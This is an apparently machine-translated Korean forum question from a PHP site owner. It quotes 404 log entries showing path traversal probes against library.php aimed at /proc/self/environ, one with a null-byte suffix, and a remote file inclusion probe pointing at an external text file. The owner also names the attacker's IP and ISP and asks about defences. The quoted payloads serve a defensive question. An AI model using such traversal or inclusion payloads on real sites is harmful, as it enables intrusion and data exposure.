내 404 로그를 살펴보면 다음 두 URL이 나타 났는데 두 URL이 모두 한 번 발생했습니다.
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
과
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00
문제가되는 페이지에는 허용 가능한 값이 6 가지 인 변수와 변수가 library.php
필요 합니다. 따라서 유효한 URL은type
id
library.php?type=Circle-K&id=Strange-Things-Are-Afoot
ID는 mysql_real_escape_string
데이터베이스를 쿼리하는 데 사용되기 전에 모두 실행 됩니다.
나는 신인이지만,이 두 링크가 모두 웹 루트에 대한 간단한 공격 인 것 같습니다.
1) 404 이외의 이런 종류의 것들로부터 보호하는 가장 좋은 방법은 무엇입니까?
2) IP를 책임 져야 하는가?
편집 : 또한이 하나를 발견
/library.php=http://www.basfalt.no/scripts/danger.txt
편집 2 : 모든 3 가지 공격에 대한 문제의 IP 216.97.231.15
는 로스 앤젤레스 외부에 위치한 Lunar Pages라는 ISP를 추적했습니다.
편집 3 : 금요일 아침 현지 시간으로 ISP에 전화하여 전화를 할 수있는 사람과 문제를 논의하기로 결정했습니다. 여기에 24 시간 정도 후에 결과를 게시하겠습니다.
편집 4 : 나는 그들의 관리자에게 이메일을 보내 결국 그들은 "그들이 그것을 찾고 있었다"고 응답 한 다음 "이 문제는 지금 해결되어야한다"고 하루 후에 응답했다. 슬프게도 자세한 내용은 없습니다.
type
사용에 포함 스크립트를 알려줍니다 (AN을하지만 IF $_GET['type'] == 'thing') {} ESLE...
,하지와 같은 직접 링크로 include 'type.php'
) (가)와 id
mysql_real_escape_string를 통해 실행되고 그는 쿼리에 사용됩니다. 그것을 알고, 나는 여전히 안전합니까?